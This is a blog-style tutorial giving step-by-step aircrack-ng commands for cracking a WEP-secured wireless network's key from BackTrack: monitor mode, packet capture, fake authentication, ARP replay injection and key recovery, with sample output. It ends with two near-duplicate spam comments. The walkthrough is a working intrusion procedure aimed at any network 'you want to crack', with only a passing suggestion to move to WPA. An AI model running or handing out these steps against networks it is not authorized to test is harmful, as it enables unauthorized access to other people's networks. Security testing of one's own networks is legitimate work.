This tutorial will walk you through a step by step procedure to crack WEP secured wireless network. It is really easy to crack WEP. There are not lots of WEP secured router found nowadays. Everybody have moved to WPA/WPA2-PSK. So after reading this post I highly advice you to change your wireless security setting to WPA or WPA2-PSK. Let us start on how to crack WEP Network Password guide.
What You’ll need
The process is quite simple and anyone can do it. But you have to be patient for a while , like for an hour or so.
- BackTrack OS. Backtrack is a bootable Linux distribution with lots of pen-testing tools and is almost needed for all my tutorials. So, if you have not installed it please read this article on how to install it.
- A compatible wireless network adapter. If you are live booting BackTrack then the internal adapter will work but I recommend an external wireless adapter.
Let’s get started
Step 1: Boot into Backtrack.
You can use any method to boot into backtrack; like from live cd, VMware, dual boot, etc. So, just boot it first into the GUI mode and open up a new console(command line) which is in the taskbar.
Note: To connect your wireless network card into WMware. Firstly, connect it to the USB and then you will see a small USB icon like in the figure below in the top right of VMware. Then, right click on it and click connect. Atlast, USB sign will turn into green colour and start to glow.
Step 2: Execute the below command to see the list of your network interfaces.
airmon-ng
Mine wireless network card interface was wlan0 and probably yours may be the same. Please note the interface name.
Step 3: Enable the monitor mode.
To enable the monitor mode please run the following commands and please note that (interface) means your wireless network interface name like wlan0.
airmon-ng start (interface)
Step 4: Let’s start airodump
Now we have started successfully started our wireless card in monitor mode. So, to search around for the wireless networks execute the following command.
airodump-ng mon0
Here you will see a lot of wireless networks if they are in range. Please keep note of the BSSID and channel of the ESSID (wireless network) you want to crack. Please note that the less the number is in the PWR column the close you are to that network. When you find it hit CTrl+C to stop it scanning and enter the following:
airodump-ng --bssid (AP BSSID address) -c (chaneel no) -w (file name you want to save with) (monitor interface)
And, in my case it will be
airodump-ng --bssid 54:E6:FC:F0:FC -c 1 -w Ehackwifi mon0
Then the screen will look like this:
NOTE: I thinks this attack will be more appropriate if you see a STATION in the next screen and also somewhat increase of the data in DATA column. But it is not compulsory, but if you could not crack the key simply then i will recommend you to wait for a client to be connected.
Step 5: Packet Injection test
This step is optional but it is done to check the range between your wireless card and the AP and either it can inject packet or not. To do so enter the following:
aireplay-ng -9 -e (essid) -a (AP BSSID address) mon0
If everything is right then it should prompt you:
09:23:35 Waiting for beacon frame (BSSID: 11:22:33:44:55:66) on channel 1 09:23:35 Trying broadcast probe requests... 09:23:35 Injection is working! 09:23:37 Found 1 AP 09:23:37 Trying directed probe requests... 09:23:37 11:22:33:44:55:66 - channel: 1 - 'essid' 09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73 09:23:39 30/30: 100%
Please see the last line. It should mostly say 100% or nearer to it. But, if it is low then either you are too far away from the AP or too close to it. And if it is zero then injection will not work.
Step 6: Let’s do a fake authentication to associate with AP
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets. The lack of association with the access point is the single biggest reason why injection fails.
So, enter the command in a new console to do a fake authentication to get associated.
aireplay-ng -1 0 -e (essid) -a (AP BSSID address) mon0
Now the successful attempt will look like the following picture.
And a failed authentication looks like:
8:28:02 Sending Authentication Request 18:28:02 Authentication successful 18:28:02 Sending Association Request 18:28:02 Association successful18:28:02 Got a deauthentication packet! 18:28:05 Sending Authentication Request 18:28:05 Authentication successful 18:28:05 Sending Association Request 18:28:10 Sending Authentication Request 18:28:10 Authentication successful 18:28:10 Sending Association Request
So, look at the “Got a deauthentication packet” and the continuous retries above. Do not proceed to the next step until you have the fake authentication running correctly. You will see a OPN written below the AUTH tab if you successfully associated with it as shown in the figure.
Step 7: ARP request replay mode
The purpose of this step is to start aireplay-ng in a mode which listens for ARP requests then reinjects them back into the network. The reason we select ARP request packets is because the AP will normally rebroadcast them and generate a new IV. Again, this is our objective, to obtain a large number of IVs in a short period of time.
Again, open another console and type the following:
aireplay-ng -3 -b (AP BSSID address) mon0
Now, it will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. But if it stucks for a long time trying to inject it may work if you try to connect another wireless card(Laptop’s Internal) to it by using any password or sending DeAuthentication packets to the AP. I do not know why but it worked for me few times. And the screen should look like below after it start to inject:
You will notice a rapid increase in the data column of airodump-ng screen. The more you got the good it is. 50,000 would be enough but you can try to crack it at 20,000 also which we are going to do on next step.
Note: But if you receive a message similar to “Got a deauth/disassoc packet. Is the source mac associated?”, this means you have lost association with the AP. All your injected packets will be ignored. You must return to the fake authentication step (Step 6) and successfully associate with the AP.
Final Step: Aircrack-ng to obtain WEP key
Now, afters you have got a lot of data you can start the cracking process and you can continue running the ARP request console so that we can get more data if there are not enough data. Please enter the following code to execute the cracking process.
aircrack-ng -b (bssid) (file name-01.cap)
Here, file name is the one which you entered with “-w” in airodump-ng command in step 4 and add “-01.cap” which is added default by BackTrack. You can also find the file by tying ls in a new console.
If everything worked fine then it will try to crack the password as shown in the figure and after few moments it will show you the KEY and if not it will ask for more data so leave the ARP Request dialog open to catch more data fast and hit Ctrl+C to stop it if these works fine. And you should drop the “:” and insert the password or either insert the ASCII directly in the password prompting box. Hope you like this tutorial and please share and comment.
In truth this is an incredible advanced write-up nevertheless like all great copy writers there are some items that may be worked upon. But in no way the less it was exciting.
In truth it was a fantastic detailed report nonetheless as with most excellent copy writers there are some factors that might be labored after. Yet never ever the less it absolutely was exciting.